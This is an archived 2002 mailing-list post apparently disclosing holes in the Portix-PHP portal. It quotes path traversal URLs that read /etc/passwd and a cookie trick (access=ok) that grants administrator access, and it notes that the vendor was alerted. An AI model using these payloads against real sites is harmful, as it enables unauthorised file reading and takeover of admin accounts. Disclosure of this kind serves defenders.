Re: Big Security Holes in Portix-PHP Portal

From: Frog Frog (leseulfrogat_private)
Date: Thu Jan 31 2002 - 09:28:54 PST

Next message: Richard Corley: "RE: switch jamming"

Previous message: M. Burnett: "Re: CSS, CSS & let me give you some more CSS"
Maybe in reply to: frog frog: "Big Security Holes in Portix-PHP Portal"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I made a tutoriel in french :
http://balteam.multimania.com/Tuts/Portix.txt


>From: frog frog <leseulfrogat_private>
>To: vuln-devat_private
>Subject: Big Security Holes in Portix-PHP Portal
>Date: 31 Jan 2002 16:19:47 -0000
>
>
>
>On all version. The last one is 0.4.02 .
>
>To view files in the hard disk :
>
>www.hostportix.com/index.php?l=../../../etc/passwd
>
>www.hostportix.com/index.php?
>l=forum/view.php&topic=../../../etc/passwd
>
>To be administrator :
>Send the cookie name=access value=ok
>to /config/config.php .
>
>Portix team has been alerted.
>




_________________________________________________________________
Rejoignez le plus grand service de messagerie au monde avec MSN Hotmail. 
http://www.hotmail.com/fr

Next message: Richard Corley: "RE: switch jamming"
Previous message: M. Burnett: "Re: CSS, CSS & let me give you some more CSS"
Maybe in reply to: frog frog: "Big Security Holes in Portix-PHP Portal"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jan 31 2002 - 10:26:49 PST